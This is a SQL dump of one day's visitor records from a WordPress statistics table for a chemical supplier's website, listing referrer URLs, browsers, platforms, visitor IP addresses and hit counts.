INSERT INTO `wp_statistics_visitor` VALUES (2601, '2016-10-11', 'https://www.miller-stephenson.com', 'Mechanize', 'Unknown', '2.7.2', '', '54.71.139.84', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2602, '2016-10-11', 'https://www.google.nl/', 'Chrome', 'Windows', '53.0.2785.143', '', '178.132.211.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2603, '2016-10-11', 'https://www.miller-stephenson.com/notify-SubZero?aHR0cDovL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb20vcHJvZHVjdC9xdWlrLWZyZWV6ZS1hbnRpc3RhdGljLw==;I2VT/9ArA5L+7EVAr8I0Dt8L63evXPptpV7grbPfGB0=', 'MSIE', 'Windows', '11.0', '', '132.3.45.79', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2604, '2016-10-11', 'https://www.miller-stephenson.com/product/157-fsl/', 'MSIE', 'Windows', '11.0', '', '130.234.108.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2605, '2016-10-11', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '46.0', '', '109.205.5.17', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2606, '2016-10-11', 'https://www.google.de/', 'Firefox', 'Windows', '49.0', '', '95.33.107.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2607, '2016-10-11', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '123.126.68.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2608, '2016-10-11', 'https://www.google.de/', 'Chrome', 'Windows', '53.0.2785.101', '', '149.216.89.154', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2609, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.189.136.90', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2610, '2016-10-11', 'https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjqvMfSndLPAhXB7oMKHZNDBOEQFggaMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-111-epoxy-stripping-agent%2F&usg=AFQjCNFQwRFTtPon2Qqwmei8CXX9dl913g&sig2=ny-UpsF7VQSVIf8CfGE7Tg&bvm=bv.135258522,d.amc&cad=rjt', 'MSIE', 'Windows', '11.0', '', '183.101.130.50', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2611, '2016-10-11', 'https://www.baidu.com/link?url=q3w0_u1wEIWxi6kdb4-3p9bhlhpLw7w_voSEdGO2Es6n2p0MgHqxsJgHQo3qO2UI&wd=&eqid=bb95679800000b130000000557fc9532', 'MSIE', 'Windows', '11.0', '', '157.122.116.167', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2612, '2016-10-11', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Chrome', 'Windows', '47.0.2526.111', '', '199.168.97.28', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2613, '2016-10-11', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Chrome', 'Windows', '46.0.2490.86', '', '199.168.97.28', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2614, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '213.189.136.90', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2615, '2016-10-11', 'https://www.miller-stephenson.com', 'Screaming', 'Unknown', 'Unknown', '', '31.168.110.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2616, '2016-10-11', 'https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwilrNeEpdLPAhUEuhQKHbbBBgQQFgglMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '83.236.189.36', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2617, '2016-10-11', 'https://www.miller-stephenson.com', 'Microsoft-WebDAV-MiniRedir', 'Unknown', '6.1.7601', '', '83.236.189.36', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2618, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '27.120.97.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2619, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '14.36.156.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2620, '2016-10-11', 'https://www.google.com.hk/', 'Chrome', 'Windows', '52.0.2743.82', '', '147.8.88.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2621, '2016-10-11', 'https://www.google.com.hk/', 'MSIE', 'Windows', '9.0', '', '117.185.27.114', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2622, '2016-10-11', 'https://www.google.com.hk/', 'Chrome', 'Windows', '45.0.2454.101', '', '61.151.218.118', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2623, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '87.236.20.52', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2624, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.167.131.153', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2625, '2016-10-11', 'https://www.google.gr/', 'Chrome', 'Android', '53.0.2785.124', '', '31.217.176.8', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2626, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '89.238.188.119', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2627, '2016-10-11', 'https://www.miller-stephenson.com/product/krytox-gpl-103/', 'Chrome', 'Android', '53.0.2785.124', '', '31.217.176.92', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2628, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2629, '2016-10-11', 'https://www.google.co.uk/', 'Firefox', 'Windows', '49.0', '', '88.211.106.98', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2630, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '128.127.71.230', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2631, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '213.251.182.115', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2632, '2016-10-11', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6', '', '130.211.103.140', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2633, '2016-10-11', 'https://www.google.bg', 'Firefox', 'Windows', '39.0', '', '82.147.130.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2634, '2016-10-11', 'https://www.google.no/', 'Chrome', 'Windows', '53.0.2785.143', '', '109.247.20.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2635, '2016-10-11', 'https://www.google.co.uk/', 'Chrome', 'Windows', '53.0.2785.143', '', '86.152.138.92', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2636, '2016-10-11', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '46.0', '', '5.189.132.217', '000', 42, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2637, '2016-10-11', 'https://www.google.it/', 'Chrome', 'Windows', '53.0.2785.143', '', '212.124.178.217', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2638, '2016-10-11', 'https://www.google.fr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjGxdnpudLPAhXFuxQKHQTID9gQFggfMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135258522,d.bGs', 'MSIE', 'Windows', '11.0', '', '90.14.212.221', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2639, '2016-10-11', 'https://www.google.com.mx/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwilk73qudLPAhXGExoKHR3eCcQQFggbMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135475266,d.d2s', 'MSIE', 'Windows', '11.0', '', '10.40.60.6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2640, '2016-10-11', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&cad=rja&uact=8&ved=0ahUKEwi06pbtu9LPAhVEjz4KHXbvAiEQFggmMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Frelease_agents.html&usg=AFQjCNEtml3Wnf9B2NvctrDFppdhnpqPXA&bvm=bv.135258522,d.eWE', 'MSIE', 'Windows', '11.0', '', '127.0.0.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2641, '2016-10-11', 'https://www.miller-stephenson.com/chemicals/release-agents/', 'MSIE', 'Windows', '11.0', '', '34.160.80.164', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2642, '2016-10-11', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwj6wYH9u9LPAhXqAcAKHQhkCYIQFggtMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-240ab%2F&usg=AFQjCNHkN_6R29TutjS9l-uP6lY6_5YA0A&bvm=bv.135475266,bs.2,d.bGg', 'MSIE', 'Windows', '11.0', '', '81.148.57.204', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2643, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.69.183.240', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2644, '2016-10-11', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwjg8Z_OvdLPAhXGWD4KHQbdB4sQFggoMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=3JEhlG-zvd6LL3P3iS5cXA', 'MSIE', 'Windows', '11.0', '', '34.160.80.138', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2645, '2016-10-11', 'https://www.google.ro/', 'Chrome', 'Windows', '35.0.1916.153', '', '172.20.3.210', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2646, '2016-10-11', 'https://www.google.ru/', 'Firefox', 'Windows', '49.0', '', '93.180.46.13', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2647, '2016-10-11', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '104.162.182.211', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2648, '2016-10-11', 'https://www.google.hr/', 'Chrome', 'Windows', '53.0.2785.143', '', '93.142.237.197', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2649, '2016-10-11', 'https://www.google.no/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwiYm5O9w9LPAhXCDpoKHTBNB2EQFgg-MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemical-products%2F&usg=AFQjCNE8qBZocicJ0jc8jOvnmnO2NLoR6w&sig2=Yq2x1uhLc5vnzS0ZHrBQ-g', 'MSIE', 'Windows', '11.0', '', '62.148.38.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2650, '2016-10-11', 'https://ultramart.biz/', 'MSIE', 'Windows', '6.0', '', '178.137.176.238', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2651, '2016-10-11', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '18.0', '', '217.69.133.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2652, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.70', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2653, '2016-10-11', 'https://canada.bizdirlib.com/node/76293', 'Firefox', 'Linux', '45.0', '', '85.109.143.169', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2654, '2016-10-11', 'https://www.findeen.fr/epikure_3270.html', 'Chrome', 'Windows', '47.0.2526.106', '', '10.10.3.151', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2655, '2016-10-11', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '138.162.0.42', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2656, '2016-10-11', 'https://www.miller-stephenson.com/product/rust-inhibitor/', 'MSIE', 'Windows', '11.0', '', '138.162.0.43', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2657, '2016-10-11', 'https://www.miller-stephenson.com/product/rust-inhibitor/', 'MSIE', 'Windows', '11.0', '', '138.162.0.41', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2658, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '147.240.161.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2659, '2016-10-11', 'https://www.so.com/link?url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&q=Chemical+Company+Home+Page.&ts=1476184246&t=064ea3e1eaf05aa73ebbe69ccd77895&src=haosou', 'Chrome', 'Windows', '45.0.2454.101', '', '222.23.225.85', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2660, '2016-10-11', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwju4LD40NLPAhXJfxoKHdhsDHUQFgg_MAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-240ac%2F&usg=AFQjCNGMGT-9sDD56bUfjS2_Mysw8RHfIA&bvm=bv.135475266,d.d2s', 'MSIE', 'Windows', '11.0', '', '194.98.70.138', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2661, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.113', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2662, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.92', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2663, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.181', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2664, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '24.63.154.108', '000', 1895, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2665, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '12.251.123.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2666, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.165.234.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2667, '2016-10-11', 'https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwiMue_Z2NLPAhWFXBQKHYtBBtIQjBAIJTAB&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemical-products%2F&usg=AFQjCNE8qBZocicJ0jc8jOvnmnO2NLoR6w&bvm=bv.135258522,d.bGs', 'MSIE', 'Windows', '11.0', '', '217.6.97.142', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2668, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.172', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2669, '2016-10-11', 'https://www.google.com/search', 'Chrome', 'Linux', '27.0.1453', '', '24.63.154.108', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2670, '2016-10-11', 'https://www.bing.com/search?q=opteon+sion&src=IE-SearchBox&FORM=IENTTR&conversationid=', 'MSIE', 'Windows', '11.0', '', '212.147.24.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2671, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '106.39.193.119', '000', 37, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2672, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2673, '2016-10-11', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '96.88.28.49', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2674, '2016-10-11', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '98.102.8.162', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2675, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '73.38.223.138', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2676, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '50.203.185.162', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2677, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '64.184.0.98', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2678, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.177', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2679, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.192', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2680, '2016-10-11', 'https://www.google.com/', 'Safari', 'iPhone', '8.0', '', '107.77.76.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2681, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Android', '44.0.2403.133', '', '70.56.2.246', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2682, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.6', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2683, '2016-10-11', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '198.175.154.212', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2684, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '131.161.10.210', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2685, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '131.161.9.235', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2686, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '198.175.154.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2687, '2016-10-11', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '198.175.154.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2688, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '132.169.182.101', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2689, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.7', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2690, '2016-10-11', 'https://www.google.lt/', 'Edge', 'Windows', '14.14393', '', '88.119.150.188', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2691, '2016-10-11', 'https://www.miller-stephenson.com', 'Firefox', 'Unknown', '42.0', '', '54.87.149.255', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2692, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '74.10.194.51', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2693, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '24.63.154.108', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2694, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.0', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2695, '2016-10-11', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '21.0', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2696, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '198.175.154.212', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2697, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '198.175.154.212', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2698, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '148.177.1.221', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2699, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '148.177.1.221', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2700, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.189.251.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2701, '2016-10-11', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '121.200.54.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2702, '2016-10-11', 'https://www.mschem.com/miller/index.php', 'Chrome', 'Windows', '53.0.2785.143', '', '50.151.36.144', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2703, '2016-10-11', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '24.63.154.108', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2704, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '37.0.2062.103', '', '141.101.201.133', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2705, '2016-10-11', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '72.142.116.26', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2706, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '24.63.154.108', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2707, '2016-10-11', 'https://www.google.com', 'Firefox', 'Windows', '41.0', '', '74.164.106.202', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2708, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.166.83.98', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2709, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '68.185.250.200', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2710, '2016-10-11', 'https://www.google.com', 'Firefox', 'Windows', '28.0', '', '54.84.142.204', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2711, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.102.8.208', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2712, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.102.8.206', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2713, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.249.88.156', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2714, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.249.88.155', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2715, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '107.0.13.67', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2716, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.102.8.210', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2717, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.249.88.154', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2718, '2016-10-11', 'https://www.aerospacemall.com/companies/view/9269/miller-stephenson', 'Safari', 'iPad', '10.0', '', '93.34.8.179', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2719, '2016-10-11', 'https://www.google.fr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&cad=rja&uact=8&ved=0ahUKEwjF5PGY99LPAhVHbxQKHfBkBrsQFghKMAY&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct-tag%2Fdegreaser%2F&usg=AFQjCNEPL-YY4F3eZZlBAS2dPhOdEW756g&bvm=bv.135258522,d.d24', 'MSIE', 'Windows', '11.0', '', '81.255.71.109', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2720, '2016-10-11', 'https://www.miller-stephenson.com', 'Google-Adwords-Instant', 'Unknown', 'Unknown', '', '66.249.83.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2721, '2016-10-11', 'https://www.miller-stephenson.com', 'Google-Adwords-Instant', 'Unknown', 'Unknown', '', '66.102.6.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2722, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '192.104.67.222', '000', 50, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2723, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '192.104.67.222', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2724, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '65.207.107.5', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2725, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '24.245.226.15', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2726, '2016-10-11', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjLtIiS-9LPAhWlzXIKHYweDngYABAN&sig=AOD64_1-_84Sw-8h-xW82mWx8YdznZEXtw&rct=j&q=&ved=0ahUKEwj8rISS-9LPAhWKOSwKHTEEBd8Q0QwIhwE&adurl=', 'MSIE', 'Windows', '11.0', '', '146.209.224.33', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2727, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.136', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2728, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.97', '', '71.211.119.155', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2729, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.253.113.137', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2730, '2016-10-11', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '9.0', '', '166.170.0.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2731, '2016-10-11', 'https://www.bing.com/search?q=miller+stephenson+chemical+co&src=IE-SearchBox&FORM=IENTTR&conversationid=', 'MSIE', 'Windows', '11.0', '', '161.84.225.13', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2732, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '209.92.247.145', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2733, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '75.99.138.170', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2734, '2016-10-11', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '9.20', '', '107.170.107.176', '000', 1, 0); 
